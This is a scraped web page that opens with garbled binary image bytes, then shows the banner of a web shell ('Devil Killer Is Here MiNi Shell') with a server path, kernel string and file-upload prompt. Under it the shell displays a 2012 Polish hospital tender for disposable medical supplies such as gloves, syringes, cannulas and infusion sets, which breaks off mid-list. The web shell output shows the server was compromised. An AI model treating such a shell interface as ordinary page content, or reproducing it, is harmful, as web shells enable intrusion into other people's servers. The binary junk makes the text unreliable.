JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120621/214572-N-2012.html

<p class="kh_header"><b>Krotoszyn: Dostawę jednorazowego sprzętu medycznego ogólnego zastosowania  
  dla SPZOZ Krotoszyn</b><br>
<b>Numer ogłoszenia: 214572 - 2012; data zamieszczenia: 21.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Młyńska 2, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 5880390 w. 253, faks 062 5880402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę jednorazowego sprzętu medycznego ogólnego zastosowania  
  dla SPZOZ Krotoszyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawę jednorazowego sprzętu medycznego ogólnego zastosowania  
  dla SPZOZ Krotoszyn - pakiet 1 - 9 poniżej 200 tys. euro..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dostawa jednorazowego sprzętu medycznego ogólnego zastosowania, maksymalnie 20 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0, 33.14.13.10-6, 33.14.13.20-9, 33.14.12.20-8, 33.14.16.24-0, 33.14.10.00-0, 33.14.10.00-0, 33.14.16.00-6, 33.14.16.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Pakiet nr 1	-	sprawozdanie z badania produktów potwierdzające parametry oferowanych rękawic wystawione przez producenta.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 6 PROJEKTU UMOWY: 2.	Strony ustalają możliwość zmiany cen wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy. Za okoliczność taką uważa się :
	-	zmianę stawek podatku VAT.
3.	W przypadku ustawowej zmiany stawki podatku VAT na przedmiot niniejszego zamówienia, jej zmiana 	następuje z mocy prawa.  

§ 13 PROJEKTU UMOWY Zmiana postanowień zawartej umowy może nastąpić wyłącznie w sytuacji przewidzianej  
w § 6 umowy oraz w przypadkach wymienionych poniżej, za zgodą obu stron wyrażoną na piśmie, pod rygorem  nieważności.
2.     Strony dopuszczają zmiany umowy w zakresie: 
-      numeru katalogowego produktu  (w tym przypadku zmiana może być dokonana na podstawie 	pisemnego powiadomienia Zamawiającego o zmianie numeru katalogowego, bez konieczności 	podpisywania aneksu do umowy, z zaznaczeniem, której pozycji w Formularzu cenowym zmiana 	numeru katalogowego dotyczy).
-        nazwy produktu przy zachowaniu jego parametrów, 
-        sposobu konfekcjonowania,
-        liczby opakowań,
-        wprowadzenia do sprzedaży przez wykonawcę produktu zmodyfikowanego / udoskonalonego,
       -        zmiany liczby badań objętych zapotrzebowaniem Zamawiającego,
       -    przedłużenia terminu realizacji umowy do czasu wykorzystania przedmiotu umowy, do wartości nie   	większej niż całkowita wartość umowy.

Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej 
ul. Młyńska 2    63-700 Krotoszyn
Pokój nr 20 ul. Młyńska 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.07.2012 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej 
ul. Młyńska 2    63-700 Krotoszyn
Sekretariat nr 1 ul. Młyńska 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rękawiczki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rękawiczka diagnostyczna lateksowa lekko pudrowana o zawartości protein poniżej 70 ug/g, mankiet rolowany, uniwersalna pasująca na lewą i prawą dłoń,  poziom AOL-1,5 . Rozmiar  XS, S, M, L, XL. (1 op a 100 szt.)			op.	12 000
2	Rękawiczka diagnostyczna winilowa bezpudrowa, powierzchnia rękawiczki gładka, mankiet rolowany, uniwersalna pasująca na lewą i prawą dłoń, poziom AOL-1,5.Wytrzymałość na rozciąganie przed i po starzeniu min. 3,6N. Rozmiar  S,  M,  L.
(1 op a 100 szt.)			op.	3 500
3	Rękawiczka diagnostyczna sterylna lateksowa pudrowana,mankiet rolowany, o  zawartosci protein ponizej 70 ug/g , gładka na całej powierzchni dłoni lub mikroteksturowana, poziom AOL-1,0, uniwersalna pasująca na lewą i prawą dłoń, pakowane parami . Rozmiar  S,  M,  L.			par	1 000
4	Rękawiczka chirurgiczna sterylna lateksowa ortopedyczna, kolor brązowy,bezpudrowa,chlorowana i silikonowana obustronnie, pokryta warstwą poliuretanu od wewnątrz,lekko teksturowana na całej powierzchni dłoni , mankiet rolowany, zawartość protein poniżej 30 ug/g, poziom AOL-1,0, grubość na środkowym palcu na pojedyńczej ściance min. 0,33 mm. 			par	3 500
5	Rękawiczka chirurgiczna sterylna lateksowa, lekko pudrowana, lekko teksturowana na całej powierzchni dłoni, mankiet rolowany lub prosty, zawartość protein poniżej 70 ug/g, poziom AOL- 1,0 grubość na środkowym palcu min 0,20 mm. Mankiet rękawiczki w opakowaniu wywinięty,  rękawiczka niezłożona. Nie dopuszcza się rękawic bezpudrowych. 			par	31 000
6	Rękawiczka chirurgiczna sterylna lateksowa, bezpudrowana, lekko teksturowana na całej powierzchni dłoni, mankiet rolowany, zawartość protein poniżej 30 ug/g, poziom AOL- 1,0 grubość na środkowym palcu 0,23 - 0,25 mm.Powierzchnia rękawiczki chlorowana i pokryta obustronnie silikonem. Mankiet rękawiczki wywinięty w opakowaniu,  rękawiczka niezłożona. Opakowanie zewnetrzne foliowane, zapewniające szczelność do momentu otwarcia.			par	2 500
7	Rękawiczka diagnostyczna bezpudrowa, syntetyczna z nawilżającą wewnętrzną warstwą aloesową, kolor zielony, mankiet rolowany, AQL - 1,5, opak. Rozmiar S, M, L
(1 op a 100 szt.)			op.	30
8	Rękawiczka diagnostyczna nitrylowa, kolor niebieski, AQL - 1,5, lekko teksturowana na całej powierzchni dłoni lub z teksturą na końcach palców, grubość ścianki na palcu w przedziale 0,08 - 0,12 mm, opak. 100 szt.			op.	2 000
9	Rękawiczka diagnostyczna lateksowa bezpudrowa, kolor ciemnoniebieski, mankiet rolowany,  poziom protein maksymalnie 40 ug/g, długość rękawiczki min. 295 mm, grubość na środkowym palcu min 0,33 mm ( na pojedynczej ściance), AQL - 1,5, opak. 50 szt.			op.	10
10	Rękawiczka chirurgiczna syntetyczna wykonana z neoprenu, kolor zielony lub jasnobrązowy, z wewnętrzną warstwą pokrytą poliuretanem, chlorowana i silikonowana, mankiet rolowany, mikroteksturowana na całej powierzchni dłoni, AQL-1,0			par	400
11	Rękawiczki foliowe op. a 100 szt.			op.	30
Zamawiający wymaga:
 dostarczenia sprawozdania z badania produktów potwierdzajacego parametry oferowanych rękawic wystawione przez producenta.										
										
Zamawiający dopuszcza:
poz. 6 rękawice o mankiecie prostym z taśmą adhezyjną 
poz. 9 długość rękawiczki dla rozmiaru S, XS 292 mm, dla rozmiaru M, L, XL min 295 mm, spełniające pozostałe wymagania SIWZ
poz. 10 rękawice o mankiecie prostym z taśmą adhezyjną, syntetyczne, chlorowane z wewnętrzną warstwą polimerową koloru brązowego.
										
							 			 
	UWAGA !							 		
	1.  Brak wypełnienia kolumny -Numer katalogowy- i Nazwa handlowa i producent, kraj wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: nie stosuje. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiającego należy wpisać zwrot - Jak u Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr   - strzykawki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Strzykawka j.u. 2 ml 			op. 100 szt.	650
2	Strzykawka j.u. 5 ml 			op. 100 szt.	750
3	Strzykawka j.u. 10 ml 			op. 100 szt.	1 100
4	Strzykawka j.u. 20 ml 			op. 100 szt.	1 000
5	Strzykawka Janett 100 ml			szt.	4 000
6	Strzykawka tuberkulinowa 1 ml z igłą (05x16 i 04x13)			op. 100 szt.	20
7	Strzykawka insulinówka 1 ml z igłą			op. 100 szt.	2
8	Strzykawka j.u. 50/60 ml Luer/Lock do pompy infuzyjnej z dwustronną skalą pomiarową			op. 100 szt.	70
9	Strzykawka 50/60 ml Luer/Lock do pompy infuzyjnej bursztynowa lub czarna  z dwustronną skalą pomiarową			szt.	450
Zamawiający wymaga:
poz.8 i 9 zakończenia strzykawki Luer - Lock 										
							 			 
Zamawiający dopuszcza:
zaoferowanie następujących opakowań, z jednoczesnym przeliczeniem ceny do 100 szt.
poz. 1 strzykawka 2 ml od 100 - 300 szt.
poz. 2 strzykawka 5 ml od 100 - 200 szt.
poz. 3 strzykawka 10 ml od 90 - 100 szt.
poz. 4 strzykawka 20 ml 0d 50 - 100 szt.
poz. 6 strzykawka tuberkulinowa 1 ml. z igłą od 100 - 300 szt.
poz. 7 strzykawka insulinówka 1 ml. z igłą od 100 - 200 szt.
poz. 8 strzykawka 50/60 ml od 50 - 100 szt.
poz. 8 i 9 strzykawki jednorazowego użytku do pomp infuzyjnych 50ml, które mogą posiadać oznaczenie logo producenta i nazwę własną na cylindrze, w celu zapewnienia pełnej identyfikacji strzykawki oraz umożliwienia poprawnego i szybkiego ustawienia w menu pompy infuzyjnej, posiadające dodatkowy pierścień stabilizujący wokół ujścia oraz poprzeczne wcięcie na tłoku.
										
							 			 
	UWAGA !							 		
	1.  Brak wypełnienia kolumny Numer katalogowy i Nazwa handlowa i producent, kraj wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: nie stosuje. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiającego należy wpisać zwrot - Jak u Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Jakość - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - igły iniekcyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Igła do iniekcji 0,45 - 0,9 mm ( dł wg zapotrzebowania bieżącego Zamawiającego)			op. 100 szt.	1 400
2	Igła do iniekcji 1,1 mm x 40 mm			op. 100 szt.	350
3	Igła do iniekcji 1,2 mm x 40 mm			op. 100 szt.	1 450
4	igła do iniekcji 1,6 x 40 mm			op. 100 szt.	20
UWAGA !							 		
1.  Brak wypełnienia kolumny Numer katalogowy i Nazwa handlowa i producent, kraj wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: nie stosuje. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiającego należy wpisać zwrot - Jak u Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Jakość - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - igły motylek,venflony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Igła motylek 0,5 x 19 - 20mm ; 0,6 x 19 mm; 0,7 x 19 mm; 0,8 x 19 mm; 1,1 x 19 mm  zakończona drenem typ Luer - Lock, lub typu Luer kompatybilnym z Luer-Lock			szt.	11 000
2.	Igła jednorazowa do Peanów 0,25 x 8 mm lub 0,3 x 8 mm 			szt.	1 000
 3.	Korek Luer - Lok 			szt.	40 000
4.	Kaniula tętnicza z zaworem odcinającym 20 G dł. 45 mm			szt.	50
5.	Kaniula dziecięca wykonana z PTFE (podwójnie czyszczonego teflonu), powinna posiadać zdejmowany uchwyt ułatwiający wprowadzanie do naczynia, oraz ma charakteryzować się max. przepływem 13 ml/min.dopuszcza się podanie kaniul w rozmiarach określonych w międzynarodowych jednostkach Gearge, przy równoczesnym zachowaniu standardowej kolorystyki i numeracji polskiej.Pakowane w sztywne opakowanie typuTyvec
zabezpieczajace przed utrata jałowości.
Rozmiary 0,6-0,7  (24G-26G )			szt.	2 500
6.	Kaniula venflon- Kaniula ma posiadać 6 pasków radiacyjnych. 
Pakowane w sztywne opakowanie typuTyvec
zabezpieczajace przed utrata jałowości. Kaniule powinny posiadać rodzaj steryliacji, rozmiar, numer serii, natomiast na opakowaniu zbiorczym wartość przepływu, z jakiego materiału wykonana jest kaniula oraz długość kaniuli. Powierzchnia kaniuli powinna być idealnie gładka oraz musi być wykonna z poliuretanu i posiadać samozatrzaskowy port boczny (samozamykajacy się korek portu bocznego).
Rozmiary -  22G, 20G, 18G, 17G, 16G, 14 G			szt.	38 000
7.	Kaniula venflon- Kaniula ma posiadać  min. 4 paski radiacyjne , pakowane w opakowanie typu bezpiecznego , gdzie część papierowa poprzez swą wielowarstwową strukturę nie ulega rozerwaniu, a tym samym zabezpiecza przed niezamierzoną utratą jałowości w trakcie użytkowania, przechowywania i transportu. Kaniule powinny posiadać rodzaj steryliacji, rozmiar, numer serii, natomiast na opakowaniu zbiorczym wartość przepływu, z jakiego materiału wykonana jest kaniula oraz długość kaniuli. Powierzchnia kaniuli powinna być idealnie gładka i musi posiadać samozatrzaskowy port boczny (samozamykajacy się korek portu bocznego), może być wykonna z poliuretanu. 
Rozmiary -  24G			szt.	600
8.	Zamknięty system dostępu naczyniowego, bezigłowy do wielokrotnej aktywacji, bez mechanicznych części wewnętrznych w technologi podzielnej mębrany silikonowej osadzonej na przeźroczystym plastykowym konektorze z końcówką LUER, z prostym torem przepływu. 			szt.	50
Zamawiajacy wymaga: 
Aby asortyment ze wszystkich pozycji  był sterylny, pakowany pojedyńczo
poz. 4 zamawiający wymaga, aby kaniule wyposażone były w kulowo suwakowy zawór odcinający , eliminujący ryzyko powstania zatoru powietrznego oraz zapobiegający niebezpieczeństwu wynikającemu z ekspozycji personelu szpitalnego na kontakt z krwią 
poz. 4 - 7 zamawiający nie wymaga, aby kaniule pochodziły od jednego producenta, natomiast  wymaga, aby w danej pozycji wszystkie kaniule pochodziły od jednego producenta										
										
Zamawiajacy dopuszcza:
poz. 3 dopuszcza korki luer lock, które posiadają trzpień zamykający światło kaniul położony poniżej własnej krawędzi.										

	UWAGA !							 		
	1.  Brak wypełnienia kolumny Numer katalogowy i Nazwa handlowa i producent, kraj wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: nie stosuje. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiającego należy wpisać zwrot - Jak u Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Jakość - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - przyrządy do płynów i krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Przyrząd do przetaczania płynów infuzyjnych - powinien posiadać długość komory kroplowej w granicach 4.0 - 6,0 cm i odpowietrzacz zamknięty/otwarty (ON/OFF).			szt.	76 000
2	Przyrząd do przetaczania krwi			szt.	3 000
3	Przyrząd do szybkiego przetaczania krwi i preparatów krwi			szt.	40
4	Przyrząd do przetaczania płynów infuzyjnych z precyzyjnym regulatorem przepływu mieszczącym się w zakresie  0 - 250 lub 
2 - 350 ml/h, dren o dł. min. 1,5 m z portem do dodatkowej iniekcji 			szt.	350
5	Przyrząd do przetaczania płynów infuzyjnych z możliwością pomiaru odśrodkowego ciśnienia żylnego OCZ			szt.	80
6	Przyrząd  do przetaczania płynów infuzyjnych bursztynowy lub czarny			szt.	100
7	Przyrząd do infuzji przy pomocy pompy perystaltycznej z wstawką typ I AP 31 P (typ pompy ASCOR AP 31 )			szt.	150
Zamawiający wymaga:
zaoferowania przyrządów nie zawierających ftalanów z wyjątkiem poz. 4.										
										
Zamawiający dopuszcza:
